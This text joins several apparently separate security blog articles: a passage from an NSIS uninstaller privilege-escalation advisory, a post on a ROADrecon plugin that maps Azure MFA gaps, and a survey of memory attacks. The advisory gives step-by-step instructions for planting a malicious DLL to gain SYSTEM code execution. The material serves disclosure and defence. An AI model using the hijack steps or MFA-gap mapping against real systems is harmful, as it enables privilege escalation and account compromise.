This is a relatively lesser-known technique that allows us to create a DLL hijacking primitive by creating a .local folder in the executable directory. DotLocal abuse has been documented and exploited previously by multiple researchers, and is used in the UACME UAC bypass tool.

As mentioned earlier, an attacker can delete the C:\Windows\Temp\~nsuA.tmp folder and re-create it with their own chosen permissions. Once the folder has been re-created with write permissions, the attacker can create an Un_A.exe.local sub-directory inside the ~nsuA.tmp folder. This will cause Windows to attempt to load SxS assemblies from this folder – which is controlled and write-able by the attacker.

In the following screenshot we can see the Un_A.exe process attempting to open the .local directory under normal usage:

If we delete the ~nsuA.tmp folder, re-create it with weak permissions, and create the .local folder sub-directory described above, we can see it now attempts to open the C:\Windows\Temp\~nsuA.tmp\Un_A.exe.local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_60b5254171f9507e subdirectory from a .local folder:

If we create the amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_60b5254171f9507e sub-directory too, then it will finally attempt to load the comctl32.dll library, giving the attacker a DLL hijacking primitive:

Therefore, to exploit this issue, an unprivileged attacker simply has to:

  1. Delete any existing C:\Windows\Temp\~nsuA.tmp folder
  2. Recreate the folder with Read/Write permissions
  3. Create the .local SxS redirection subfolder containing a malicious COMCTL32.dll file
  4. Trigger the uninstaller.exe process to run as a privileged (e.g. SYSTEM) user (this will be product specific – e.g. RPC/COM).

This would give the attacker code execution within the Un_A.exe process, which runs with the same privileges as the uninstaller.exe process.

Proof of Concept

Whilst a full Proof of Concept is not provided, some example code can be found here which shows how to determine the required SxS folder name.

The following screenshot shows the PoC being run against a simple test NSIS package.

  • At 1: the PoC exploit is run, creating the necessary folder structure.
  • At 2: the folder structure shows ~nsuA.tmp directory, and the .local folder containing the SxS DLL Hijack.
  • At 3: the uninstaller.exe package is run under the SYSTEM account using PSExec (for example purposes).
  • At 4: the DLL hijack is triggered, resulting in a new cmd.exe Window being spawned as SYSTEM.

Affected Software

We have identified multiple products using NSIS where this vulnerability is exploitable and leads to privilege escalation.

If your software package makes use of NSIS versions prior to 3.09 and allows a low-privileged user to initiate an uninstall operation from a privileged context (for example, auto-updaters, or software which uses a service for maintenance tasks such as repairing an application install), then it is likely to be exploitable.

Furthermore, if your software can be (un)installed through a deployment service such as MDM or Configuration Management software, then it may also be exploitable via this vulnerability – as many of these products install software packages as SYSTEM.

The Patch

A proposed patch was provided to the NSIS project maintainers, which removed the permissive ACE allowing all users to delete the temporary directory, and added error handling to delete the directory if it already existed.

This was reviewed by the project maintainers, who implemented multiple fixes. With these fixes, the uninstaller:

  • Creates an isolated temporary directory for each uninstaller process, deleting any existing directories if present.
  • Checks that the temporary directory does not contain a symlink before deleting it.
  • No longer applies the permissive ACL.

These fixes were released in NSIS version 3.09.

Report Timeline

2023-02-08 - Reported to NSIS Maintainers
2023-02-22 - Confirmation from maintainers, and patch provided for review
2023-05-21 - Initial patch committed to NSIS project
2023-05-30 - Feedback provided by NCC regarding proposed patch
2023-06-03 - Additional hardening added
2023-05-05 - Further feedback provided about patches
2023-06-21 - Additional hardening added
2023-07-01 - NSIS version 3.09 released
2023-07-11 - NCC Group advisory published

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate and respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  2023-07-11

Written by:  Richard Warren

Getting per-user Conditional Access MFA status in Azure

Introduction

A long time has passed since Microsoft implemented the first Multi-Factor Authentication (MFA) approach in Azure Active Directory with the Per-user MFA functionality [1]. However, this simple on/off mechanism has been replaced over time by the Conditional Access Policy (CAP) feature, which was released in July 2016.

A conditional access policy is a set of conditions which, if matched, enforces its access controls on the assigned users when they try to access the scoped applications. Access controls can block access directly, or grant access if some checks are met, such as the user completing the MFA validation or the accessing device being compliant. Users can be assigned individually, through security groups, or through roles.

Conditions within a conditional access policy are combined with a logical AND. This means that the policy will apply only in those cases where all the specified conditions match. Some of these conditions have fixed values, while others such as device filters are more customizable. Also, conditions such as Locations and Device platforms have two lists: one for inclusions and another for exclusions.

However, conditions are not the only piece in determining whether a conditional access policy applies to a given user or not. Scoped applications could be set from the All cloud applications setting, which covers any access to the AAD controlled applications including the Microsoft 365 ecosystem, to single applications. There is even a choice of scoping by user actions and authentication contexts instead of applications.

Finally, it is worth noting how CAPs interact with each other. Basically, if a sign-in event from a given user is covered by more than one CAP, all of them apply. This means that all the grant access controls among the applying policies will be requested (MFA, device compliance…). Policies configured with the deny access control have priority, and access will simply be denied if at least one of these applies [2].
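
The evaluation rules described above (conditions within a policy are ANDed, grant controls from all applying policies accumulate, and a single blocking policy wins) can be sketched as follows. The Policy class, the condition keys and the control names are hypothetical simplifications for illustration; real policies also support exclusion lists and "require one of" grant controls, which are not modelled here.

```python
from dataclasses import dataclass, field

@dataclass
class Policy:
    name: str
    conditions: dict  # e.g. {"client_app": {"browser"}}
    controls: set = field(default_factory=set)  # e.g. {"mfa"} or {"block"}

def applies(policy, sign_in):
    """A policy applies only if every one of its conditions matches (AND)."""
    return all(sign_in.get(key) in allowed
               for key, allowed in policy.conditions.items())

def evaluate(policies, sign_in):
    """Return 'block', or the set of grant controls the sign-in must satisfy."""
    required = set()
    for policy in policies:
        if not applies(policy, sign_in):
            continue
        if "block" in policy.controls:
            return "block"           # a single blocking policy wins
        required |= policy.controls  # grant controls accumulate
    return required

policies = [
    Policy("mfa-browser", {"client_app": {"browser"}}, {"mfa"}),
    Policy("compliant-windows", {"platform": {"windows"}}, {"compliant_device"}),
    Policy("block-legacy", {"client_app": {"legacy"}}, {"block"}),
]
# Same user and platform, different client: the desktop client is not asked for MFA.
print(evaluate(policies, {"client_app": "browser", "platform": "windows"}))
print(evaluate(policies, {"client_app": "desktop", "platform": "windows"}))
```

The second call returns only the device compliance control, which is exactly the kind of MFA gap that the rest of this post is concerned with.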

All these variables provide great granularity to the CAP feature, but this flexibility comes at a cost: there can be so many factors to consider when evaluating whether a user will be asked to comply with the access controls that there is no easy way to check whether users have MFA enabled, as there was with per-user MFA. For example, one could find situations in which the same user is asked to perform multi-factor authentication if they try to sign in to Exchange using a web browser, but not with the Desktop client. Such situations are known as ‘gaps’, and their number may grow exponentially as a given tenant contains more users, groups, and conditional access policies.

Tools to assist in determining the MFA status

Currently, there are a few tools that may help in the task of identifying gaps coming from conditional access policies, each following a different approach:

  1. Azure Portal: it sounds obvious, but the Azure Portal provides good insight into the overall MFA status. The Overview section in the Conditional Access blade offers security alerts that include the percentage of sign-ins out of scope of CAPs and the percentage of sign-ins lacking MFA. Also, the sign-in logs in the same blade are quite useful to filter sign-ins by authentication requirements, and each entry can be drilled into to analyse which CAPs were applied and which ones were not. However, it is limited to data generated by sign-ins in the last month, meaning that it could miss MFA conditions if users did not log in during that period, or if they already have an open session that does not require re-authentication.
  2. Conditional Access Gap Analyzer Workbook [3]: a tool aimed at IT Administrators that works similarly to the Azure Portal. The main difference is that sign-in logs are stored in a Log Analytics workspace, solving the time-limit problem that is present in the portal. Results are still non-deterministic since it relies on sign-in events. From the auditor’s position, this tool cannot be used unless agreed beforehand, since it requires a resource to be created in advance.
  3. Azure AD Assessment [4] and Monkey365 [5]: although these tools are totally different, they follow the same approach regarding CAP analysis. In this case, the tools access the tenant CAPs directly and determine whether some security best practices have been applied, such as the existence of a CAP for every user and another for Global Administrators, but they do not include gap analysis.
  4. CAOptics [6]: this tool was designed specifically for CAP gap analysis using a smart approach: it retrieves the tenant CAPs, then it generates permutations to represent each set of conditions for each CAP and affected user, group or role, indicating whether the permutation has a termination (it is covered by one or more CAPs) or not. These permutations are then merged and gaps are exposed in the form of unterminated permutations.
  5. Azure-AD-Password-Checker [7]: a script that uses an original approach to raise potential MFA gaps by getting each user’s creation date and password change date, then comparing those in search of anomalies that represent a lack of MFA configuration by the user.

Per-user conditional MFA tool

From an auditor’s point of view, it would be really interesting to be able to get a deterministic, accurate report of the MFA status for each user in a target tenant. Of the tools explained above, the only ones that can be classed as deterministic are Azure AD Assessment, Monkey365 and CAOptics. The latter is the only one in this category that also focuses on raising gaps, but its output is not per-user oriented.

This situational information is useful not only for customers from a defensive perspective, but also for attackers, all the more so now that Microsoft has enforced number matching and any attempt to access an account with guessed credentials and MFA enabled is unlikely to succeed.

Considering all of this, a decision was made to create a new plugin for the ROADrecon tool [8] that would receive a CAOptics report as input to generate a per-user MFA status report. There are multiple publicly available tools that already perform Azure AD security analysis, but ROADrecon suited our purpose well since it implements a plugin system and a really useful data model fed by a local database that plugin developers do not need to handle.

Transforming the input data into a per-user MFA list was not a simple task. For this reason, the plugin was designed to execute three main phases: the first one ingests the output data generated from CAOptics, the second one applies post-processing to enhance the per-user MFA status report and the last one is the output generation.

Input processing phase

The initial phase can be divided into two major steps. The first one is the input parsing and the mapping of each row to its permutation, also called “lineage” in CAOptics. Since a per-user approach is going to be followed and the input report contains object IDs not only for users, but also for groups and roles, these must be “unrolled” so that the permutation list only contains user IDs.

Unrolling groups and roles

Unrolling groups and roles may sound trivial, but Azure Active Directory does not specify a maximum nesting depth. To make matters worse, a child group can include any of its parent groups as a member, generating loops in the tree that could result in infinite lookups. CAOptics already considered this situation and implemented the most efficient approach, which consists of establishing a reasonable limit of one level of depth.

Since we wanted to reach more accurate results even for “infernal” scenarios, and also considering that CAOptics was designed to not resolve role memberships into users, we decided to implement a lookup functionality to get a result that would fit better in the per-user approach.

Given an object ID, let’s call it the root node, the lookup algorithm first checks which kind of object it is dealing with. If it is a user, no action is required. If it is a group or a role, then the node is expanded, meaning that its members are retrieved as child nodes, and the same procedure is applied recursively to each of these nodes. To prevent infinite loops, nodes that have already been expanded are stored in an expanded nodes list, which is checked by the recursive function before it calls itself again.

Once a root node and its children have been expanded, the final relationship is root node -> list of all its children user object IDs, which is cached into a resolved nodes cache for efficiency. This lookup procedure comes from Graph Theory and is known as Depth-First Search (DFS).

For a given permutation being resolved, if the lookup procedure returns a list of multiple object IDs, the permutation is replaced by multiple copies of the same permutation, each containing a single object ID belonging to one of the returned users.
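
A minimal sketch of this lookup is shown below. It is not the plugin's actual code: the function names, the kind_of and members_of dictionaries (standing in for database queries) and the permutation layout are all assumptions made for illustration. Only fully resolved root nodes are cached, since partial results gathered inside a membership loop could be incomplete.

```python
def resolve_users(root_id, kind_of, members_of, resolved_cache):
    """Return the sorted user IDs reachable from root_id via a depth-first search."""
    if root_id in resolved_cache:
        return resolved_cache[root_id]
    users, expanded = set(), set()

    def visit(node_id):
        if kind_of[node_id] == "user":
            users.add(node_id)
            return
        if node_id in expanded:  # already expanded: break the membership loop
            return
        expanded.add(node_id)
        for child_id in members_of.get(node_id, ()):
            visit(child_id)

    visit(root_id)
    resolved_cache[root_id] = sorted(users)
    return resolved_cache[root_id]

def unroll_permutation(permutation, kind_of, members_of, resolved_cache):
    """Replace one permutation by one copy per resolved user."""
    user_ids = resolve_users(permutation["object_id"], kind_of,
                             members_of, resolved_cache)
    return [{**permutation, "object_id": user_id} for user_id in user_ids]

# g1 and g2 contain each other, and role r1 contains g1.
kind_of = {"u1": "user", "u2": "user", "g1": "group", "g2": "group", "r1": "role"}
members_of = {"g1": ["u1", "g2"], "g2": ["u2", "g1"], "r1": ["g1"]}
cache = {}
print(resolve_users("r1", kind_of, members_of, cache))  # ['u1', 'u2']
```

For very deep nesting, an explicit stack would avoid hitting Python's recursion limit; the recursive form is kept here because it mirrors the description more directly.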

Determining the MFA approach

Getting the MFA status for every user also depends on the policy design, which can follow the include-based or the exclude-based approach. CAOptics is designed for the latter [9], and this must be considered when a tenant is found that follows the include-based approach.

This is where the second major step in the input processing phase comes into play. Once all permutations are parsed, the plugin determines whether there is a “main” MFA policy or not by examining the users:All lineage and terminations. We use the term main policy for the CAP that is scoped to all users and all cloud applications. If there is such a policy in place, all users are initially marked as MFA Enabled and then permutations without terminations are used to modify this status to Conditional or Disabled. When no main policy is detected, all users start from the MFA Disabled status and then their status is modified to Conditional or Enabled when examining their particular permutations.
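
The status assignment can be sketched as a small function. The exact rule the plugin uses to choose between Conditional and the opposite extreme is not spelled out here, so the rule below (all permutations terminated means Enabled, none terminated means Disabled, a mix means Conditional) is an assumption, as are the function name and the input format.

```python
def mfa_status(has_main_policy, terminations):
    """Derive a user's MFA status from their permutations.

    terminations holds one boolean per permutation of the user:
    True if the permutation is terminated (covered by a CAP), else False.
    """
    # Starting point when nothing else is known about the user.
    status = "Enabled" if has_main_policy else "Disabled"
    if not terminations:
        return status
    if all(terminations):
        return "Enabled"      # every case is covered
    if any(terminations):
        return "Conditional"  # some cases are covered, some are gaps
    return "Disabled"         # no case is covered

print(mfa_status(True, []))             # Enabled
print(mfa_status(True, [True, False]))  # Conditional
print(mfa_status(False, []))            # Disabled
```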

The data model in ROADrecon already implements a strongAuthenticationDetail field for storing information about MFA, mostly focused on the legacy per-user MFA feature. The plugin extends this field with new attributes such as CapMfaStatus and CapMfaList to store the new information without overwriting the original data.

Post-processing phase

Up to this point, the plugin has a preview of the conditional per-user MFA status based on CAOptics results. However, since the two tools differ in their output approach, a bit more fine-tuning is needed to make the report more accurate.

First, policies are processed individually to check whether they have any influence or not. Those that are configured as Report only or Off are skipped. The same applies to policies that have no grant/deny controls or have an undefined scope. If a policy applies, then it is associated with every scoped user.

From that point, those conditions that have not been included in the MFA checking process are processed: authentication context scopes, devices, user risks, sign-in risks and location conditions. If one or more of these configurations are detected, every user assigned to that policy will be updated to MFA Conditional status and the extra condition will be added to the report. For those users that were already marked as MFA Enabled, this process is omitted since the most restrictive policy wins.

Lastly, additional notes are added for those users that are affected by a blocking policy. To be more precise, the policy name will be appended to the blocking CAPs list of those users, but the MFA status is not updated here. This is because CAOptics already treated the blocking policies as MFA grant policies. While this may not be the most accurate approach for the plugin output, it will still reflect the MFA gaps with that extra information, which is enough for the purpose of this plugin.
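
The post-processing steps above can be sketched as follows. The dictionary layout, the state labels ("off", "report_only") and the field names are hypothetical and do not reflect the ROADrecon data model; the sketch only shows the order of the checks.

```python
SKIPPED_STATES = {"off", "report_only"}  # hypothetical labels for Off / Report only
EXTRA_CONDITIONS = ("authentication_context", "devices", "user_risk",
                    "sign_in_risk", "locations")

def post_process(policies, report):
    """Refine a per-user report; report maps user -> status and note lists."""
    for policy in policies:
        # Skip policies that have no influence.
        if (policy["state"] in SKIPPED_STATES
                or not policy["controls"] or not policy["users"]):
            continue
        extras = [c for c in EXTRA_CONDITIONS if policy.get(c)]
        for user in policy["users"]:
            entry = report[user]
            entry["affected_by"].append(policy["name"])
            # Extra conditions downgrade to Conditional unless already Enabled.
            if extras and entry["status"] != "Enabled":
                entry["status"] = "Conditional"
                entry["bypass_conditions"].extend(extras)
            # Blocking policies are only noted; the status is left untouched.
            if "block" in policy["controls"]:
                entry["blocking_caps"].append(policy["name"])
    return report

def new_entry(status):
    return {"status": status, "bypass_conditions": [],
            "blocking_caps": [], "affected_by": []}

report = {"alice": new_entry("Disabled"), "bob": new_entry("Enabled")}
policies = [
    {"name": "P1", "state": "enabled", "controls": {"mfa"},
     "users": ["alice", "bob"], "locations": ["trusted"]},
    {"name": "P2", "state": "report_only", "controls": {"mfa"}, "users": ["alice"]},
    {"name": "P3", "state": "enabled", "controls": {"block"}, "users": ["bob"]},
]
post_process(policies, report)
print(report["alice"]["status"], report["bob"]["blocking_caps"])  # Conditional ['P3']
```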

Usage and output

Some prerequisites must be met before using the plugin. The first step is to obtain the report from CAOptics, which is used as input for the import plugin. It is important to use the --allTerminations flag, otherwise the report will not be accepted. An example CAOptics command line:

node ./ca/main.js --mapping --clearTokenCache --clearMappingCache --allTerminations

The report will be generated in two formats, CSV and MD. The CSV version will be used as input for the plugin.

Then we can move to ROADrecon and issue the authentication command. Currently, the plugin is only available in the plugin developer’s repository (https://github.com/acap4z/ROADtools), but a pull request to the main repository is going to be issued. It is important to note that the user must have the policy.read.all privilege assigned through a role such as Global Reader:

python .\roadrecon\roadtools\roadrecon\main.py auth --device-code

Once the tool has the authentication token, it can perform the tenant enumeration with the following command:

python .\roadrecon\roadtools\roadrecon\main.py gather --mfa

Finally, the CAOptics import plugin can be launched. By default, it will look for the CSV report in your current directory, but the path can be specified with the --input_file flag:

python .\roadrecon\roadtools\roadrecon\main.py plugin caopticsimport --input_file caoptics_report.csv

The final report will be written in a separate CSV file called output_report.csv by default, although this can be changed with the --output_file flag. There is also an option of getting a console output by specifying the --print flag, which displays a color code depending on the MFA status, but keeps additional info out such as conditions and CAP lists.

The CSV version contains more details than the printable version in the following columns:

  • User Principal Name: list of all users registered in the tenant, including guests.
  • MFA Status: the status obtained from the processing and post-processing phases for each user. Values can be:
    • Enabled: one or multiple CAPs affecting the user covers every sign-in case with MFA.
    • Conditional: the user is affected by one or more CAPs, but there are cases that are not covered by MFA.
    • Disabled: the user is not affected by any CAP that manages grant controls.
  • MFA Bypass Conditions: when a user is marked with MFA Status conditional, the gaps will be listed in this column. Note that the ones coming from CAOptics will be more precise than those detected by post-processing tasks.
  • Blocking CAPs: name of the CAPs with grant controls set to Block that affect the user.
  • Affected by CAPs: list of all CAP names that affect the user.

It is important to remark that the MFA Status reported by the plugin does not consider the legacy per-user MFA status. Thus, it is possible to find tenants in which some users are reported with MFA Status Disabled, but their MFA has been enforced in the per-user MFA configuration. Microsoft recommends switching to conditional access to prevent such confusion in the MFA management [10].

The tool is currently available at the plugin developer’s repository: https://github.com/acap4z/ROADtools

Acknowledgements

Big thanks to those workmates that helped me with this research process. Special thanks to Simone Salucci, Daniel López and Manuel León for reviewing this post and suggesting some meaningful improvements.

References

[1] Per-user Azure AD Multi-Factor Authentication: https://learn.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates

[2] Conditional Access Policies: https://learn.microsoft.com/en-us/azure/active-directory/conditional-access/concept-conditional-access-policies

[3] Conditional Access Gap Analyzer Workbook: https://learn.microsoft.com/en-us/azure/active-directory/reports-monitoring/workbook-conditional-access-gap-analyzer

[4] Azure AD Assessment tool: https://github.com/AzureAD/AzureADAssessment

[5] Monkey365 tool: https://github.com/silverhack/monkey365

[6] CAOptics tool: https://github.com/jsa2/caOptics

[7] Azure-AD-Password-Checker tool: https://github.com/quahac/Azure-AD-Password-Checker

[8] ROADtools: https://github.com/dirkjanm/ROADtools

[9] CAOptics opinionated design: https://github.com/jsa2/caOptics#opinionated-design

[10] Convert per-user MFA enabled and enforced users to disabled: https://learn.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates#convert-per-user-mfa-enabled-and-enforced-users-to-disabled

Overview of Modern Memory Security Concerns

This article discusses the security concerns which must be taken into account whenever designing an embedded system. Failure to account for these security concerns in the system’s threat model can lead to a compromise of the most sensitive data within.

Memory is a crucial part of any computer subsystem. The CPU executes instructions and operates on data, but all that code and data need to exist somewhere. This is the role of the memory, which comes in many forms. We often talk about the size, performance, and power consumption characteristics of memory, but the security properties can be important as well, and are often overlooked. We will focus on the security properties of the memories themselves and not delve too much into system-level vulnerabilities such as DMA attacks and memory safety, which are already well-covered elsewhere.

Figure 1: Early core memory (ferrite donuts with hand woven read/write lines) sent people to the moon (image courtesy of Wikipedia)

Memory technologies can broadly be divided into two categories, non-volatile and volatile. Volatile memory requires power to maintain its contents, while non-volatile memory does not. Volatile memory, such as RAM, is often used for temporary storage of data that needs to be quickly accessed and processed by a computer. It is useful for storing data that is likely to change frequently, as it allows for quick modification. On the other hand, non-volatile memory is used for long-term storage of data that does not need to be modified as frequently, and needs to be stored across power cycles. It is useful for storing data that is not likely to change, such as firmware and user data.

Volatile Memory Technologies

In ancient systems, volatile memories were built from vacuum tubes, ferrite cores (Figure 1), or transistor flip-flops. In modern systems, this role is served by Random Access Memory (RAM). This generally comes in two flavors, Static RAM (SRAM) and Dynamic RAM (DRAM), and most systems will contain both in various quantities to accommodate the performance, power, and size (both physical and logical) needs of the system.

For volatile memory of all types, confidentiality and integrity are the main security properties of concern. The ability of an attacker to maliciously read/write the contents has traditionally been the domain of software vulnerabilities such as memory safety issues. But we’ve seen the emergence of techniques that leverage hardware issues to achieve the same thing. Physical attacks are the most straightforward, especially when the hardware may be deployed in hostile environments (e.g. edge computing), vulnerable to temporary access by an attacker (e.g. a supply chain interdiction, or “evil maid”), or whenever the device may be easily lost, stolen, or confiscated (as in the case of mobile devices). Many of these known vulnerabilities are also exploitable by a local attacker on the system who may attempt to escalate privileges, and some of these are even exploitable remotely over the network.

In all cases, the solutions typically involve encrypting data, preferably using non-malleable ciphers, though this is uncommon for performance reasons. Performance overhead is an oft-cited concern unless the memory controller implements the encryption in hardware. You also need a safe place to store your memory encryption keys, which can itself be a challenge (typically solved by generating and storing the key within the SoC and accessible only to the memory controller itself). For microcontrollers with built-in RAM, directly accessing the bus is a much harder challenge for an attacker; however, many such devices have other ways to access the internal memories through debug functionality, which brings a new set of security concerns related to access control.
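
To see why malleability matters, consider a toy stream-style memory encryption in which data is XORed with a keystream derived from the key and the memory address. The construction below (a SHA-256-based keystream and the names keystream and xor_crypt) is purely illustrative and is not how any particular memory controller works; it only shows that flipping a ciphertext bit flips the same plaintext bit, without knowledge of the key.

```python
import hashlib

def keystream(key, address, length):
    """Toy keystream derived from the key and memory address (illustration only)."""
    stream = b""
    counter = 0
    while len(stream) < length:
        block = key + address.to_bytes(8, "big") + counter.to_bytes(4, "big")
        stream += hashlib.sha256(block).digest()
        counter += 1
    return stream[:length]

def xor_crypt(key, address, data):
    """Encrypt or decrypt (same operation) by XORing with the keystream."""
    return bytes(d ^ k for d, k in zip(data, keystream(key, address, len(data))))

key = b"\x01" * 16
ciphertext = xor_crypt(key, 0x1000, b"secure_boot=1")

# The attacker flips one bit of the last ciphertext byte, turning '1' into '0'.
tampered = ciphertext[:-1] + bytes([ciphertext[-1] ^ 0x01])
print(xor_crypt(key, 0x1000, tampered))  # b'secure_boot=0'
```

A non-malleable or authenticated mode would instead cause such a modification to be detected or to garble the whole block, at the cost of extra latency and storage.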

SRAM

A typical single SRAM cell consists of six transistors (Figure 2): a pair of inverters arranged in a feedback loop to store a value, and gated connections to the row and column lines for reading and writing. This allows each cell to be addressed individually and quickly, but consumes energy the entire time the cell is powered, and takes up more area on a silicon die than a DRAM memory cell. Its use is most often limited to high speed memories within an SoC or microcontroller (caches, and other internal RAMs) and it is often sized in kilobytes or megabytes.

The startup value of an SRAM cell will contain a bias due to the unstable balanced nature of the inverter feedback loop (i.e. whichever inverter powers up faster will win). This bias is somewhat random and can be exploited to develop a useful physically unclonable function (PUF) on which to build higher level security features. The bias can, however, be altered by ionizing radiation and annealing, which can affect the security guarantees of a PUF. Annealing can also be dependent on the current state of the SRAM. This may allow an attacker to effectively freeze the current SRAM contents and, similar to a cold boot attack on DRAM (discussed below), recover those contents at a later time.

Intentionally causing bit-flips within memory can be achieved through a variety of advanced techniques including voltage and clock glitching, electromagnetic pulses (EMP), optical fault injection using infrared lasers, and various forms of ionizing radiation. All of these have the effect of altering data, and if done carefully could alter the behavior of the system in ways that are desirable to the attacker. Frequently, the attacker’s goal is to subvert a low-level security control, such as secure boot, debug re-enablement, or a vital authentication scheme.

Figure 2: SRAM (left) and DRAM (right) cell designs. 

DRAM

A DRAM cell consists of a single capacitor (Figure 2) which can passively (i.e. without power) store an amount of charge (an analog value enabling multiple bits per cell), and a single transistor to connect this to the row and column lines. While this simplicity offers much higher density (therefore higher storage capacity) and lower power than SRAM, it comes with a number of tradeoffs. Parasitic leakage of charge into the substrate causes the stored value to degrade over time (on the order of seconds). This is overcome by periodically refreshing the stored values on every cell, a necessary interruption which can limit the performance of the overall system. Similarly, the simple design requires that all cells in a row be read together as a stream, an operation which disturbs the stored charge, requiring that it be written back again. These performance impacts are most often remedied by pairing DRAM with a faster but smaller SRAM for caching purposes.

The tightly-packed nature of DRAM is also the cause of some serious security concerns. Crosstalk (electromagnetic interference) between rows within the extremely dense DRAM memory becomes a concern, and researchers have developed techniques for exploiting this called RowHammer and RAMBleed. These vulnerabilities allow a local attacker on the system or a remote attacker (see ThrowHammer/NetHammer variants) to write (RowHammer) and read (RAMBleed) memory that they do not have permission for by repeatedly accessing, or hammering, adjacent memory rows. Any system using DRAM is vulnerable (including Error Correction Code (ECC) memory), and no defense is completely effective. The best defense strategy currently relies on detection of active RowHammer attacks with a targeted row refresh (TRR), but such mitigations are optional and not yet widely deployed. Many proof-of-concept demonstrations are publicly available and it is only a matter of time before we see these attacks being used by malware in the wild.

For physical attacks, the same interposers that enable engineers to investigate memory signal issues also allow an attacker easy access to the memory bus between the host processor and the memory. Cold Boot attacks exploit the relatively slow data decay when the DRAM memory is unpowered, and this time can be extended to minutes/hours using cold temperatures. Techniques have been developed to apply this attack even to soldered-down memories.

Hybrid Memory Cube (HMC) and High Bandwidth Memory (HBM)

HMC and HBM are sophisticated uses of DRAM technology that achieve much higher performance for memory intensive applications, primarily through reduced latency and higher parallelism. Importantly for security, these devices contain additional controller elements (with yet more complex firmware) that must be robust and secured from attackers.

Non-Volatile Memory Technologies

Non-volatile memory stores the data and code persistently when the power is off.  These come in an even wider array of options. Historically, various forms of magnetic media were used, including tapes, floppy disks, and spinning hard drives. These all require mechanical components which themselves are subject to normal wear and failure. Malicious wear can cause Denial-of-Service attacks in all types of persistent memory.

Solid state devices have some distinct advantages with respect to performance, power, and mechanical reliability. These devices are mostly based on storing charge using various microscopic semiconductor cell designs. Read-only Memory (ROM) comes in a number of forms and is often programmed during semiconductor fabrication. It is of limited utility in applications with dynamic content. Programmable ROM (PROM) allows a single programming operation to occur (e.g. by an OEM device maker) and is otherwise similar to ROM. Erasable PROM (EPROM) devices are slightly more versatile in that they can be erased by UV light and reprogrammed, which allows some level of manual field upgradeability. Electrically erasable PROM (EEPROM) and flash memory are fully in-circuit erasable due to the use of internal charge pumps and other devices. Flash memory is the most common solid state device you will find in almost all modern electronics.

Figure 3: Microcontroller with UV erasable EPROM window

From a security perspective, non-volatile memories have all the same concerns with bus access as does RAM, but they are more pronounced because of the lower pin count and lower speeds. This makes it easier for an attacker to access without expensive equipment.  Moreover, thanks to the persistent nature of the memory, you have additional attacks to worry about:

  1. Offline (or “chip-off”) attacks, like cold-boot attacks on RAM, are where the memory is simply removed from the device and read/modified using an off-the-shelf flash reader, an operation that takes only minutes for practiced hands.
  2. Denial of service attacks due to malicious premature wear. Modern flash devices are only rated for 10k (or fewer!) erase cycles before they need replacement. When embedded in a product rather than say a removable micro-SD card, this can be devastating.
  3. NAND (very common) flash technology achieves great density but suffers from expected failure rates, and so requires bad block management and wear leveling algorithms. Commonly this functionality is implemented within a small microcontroller within the memory chip itself (eMMC and UFS) or within a companion storage controller chip (as in SSDs and NVMe drives). This frees the host operating system from having to tame these complexities. However, this modular design introduces exploitable data remanence concerns, and you may not know if data that should be erased is actually erased, which may lead to privacy concerns. JEDEC introduced the Secure Trim and Secure Erase commands in the eMMC 4.4 specification to help overcome this problem, however these are often slow and remain unused in the majority of embedded systems.
  4. Even when the secure erase functionality is used correctly, data might still be recoverable due to analog threshold effects. NIST provides media sanitization guidance that’s applicable to flash memory as well as magnetic media, and of course, physical destruction is effective.
  5. Ordinarily flash devices are intended to be erased in blocks of a particular size (tens or hundreds of kilobytes at a time). EEPROM and EPROM devices are similarly intended to be erased as a whole unit. Systems that rely on these properties might be vulnerable to abuse when smaller regions, even single bytes, are selectively erased, which might, for example, allow the bypass of some security features.
  6. Finally, when the flash reaches end-of-life, its behavior is completely implementation defined. Some flash manufacturers choose to simply freeze the contents in place as a permanent record with no capability to erase, requiring physical destruction of the chips by security conscious users.

RPMB

Some memories (eMMC, UFS, SD, NVMe) can include a Replay Protected Memory Block (RPMB). This special data partition cannot be written or modified without knowledge of the provisioned secret key. Read protection can be further provided by encrypting the data. The secret key must be known to the host SoC and stored safely. It must be programmed into the memory chip (usually by the host firmware on first boot) in a secure environment because this operation itself is vulnerable to snooping. A common attack is to replace a provisioned memory chip with a new blank part, which may cause a careless host to provision the blank part with the same RPMB secret used on the original memory part, thus revealing it to the attacker. The SoC must treat the provisioning operation as a one-time event to avoid this.

Hybrid and Exotic Memory Technologies

It’s worth discussing a few other related technologies that do not cleanly fit into the above categories.

Battery-Backed RAM

RAM is sometimes used as non-volatile storage, in concert with a small battery or supercapacitor to provide power for data retention. This is frequently seen in applications such as:

  1. A part of a tamper detection system for security sensitive devices. These systems must be able to defend themselves from an attacker even when the main system power has been cut. Securing the backup power supply to the memory may be very important to the operation of the anti-tamper subsystem, and it therefore needs to be carefully designed to be within the anti-tamper envelope itself.
  2. Always-on-power (AOP) domains within a microcontroller. Most microcontrollers and SoCs implement low power features that let the bulk of the chip go to sleep and save power, while only a tiny portion of the system remains powered in order to resume without a full boot cycle. This functionality is supported by a small low-power SRAM used to retain system state across sleep/resume operations. For performance reasons a resume operation does not perform the extensive security validations (such as secure boot) that a full system boot would. Therefore it is vital that an attacker not be able to directly write the AOP RAM state, thus tricking a device into performing a resume from sleep rather than a full boot operation.

One-Time-Programmable Fuses

Modern SoC devices contain a number of security and other configuration options that are programmed only once. These typically come in some form of OTP memory, or “fuses”, and number in the tens or hundreds of bits. Most often these are set during device manufacturing, but in some situations it may be desirable to program them in the field (for say, software roll-back prevention). These fuses can be used for any number of purposes, but common uses include disabling of security-compromising debug interfaces, enabling hardware and firmware security features such as Secure Boot, and storage of sensitive encryption keys (for use with RPMB or RAM encryption).

Attacks against the fuses most often target the software that makes use of the fuses (through fault injection, side channel leakage, or software vulnerabilities), but there are some interesting vulnerabilities that (depending on the design) may affect the fuse arrays themselves. Two examples to highlight this:

  1. Under certain conditions, programmed (“blown”) fuses can regrow, thus putting the system into a typically less-secure state. Such behavior is likely to require either privileged access to the software environment, or physically invasive techniques, and so might be of a lower concern, depending on the system threat model.
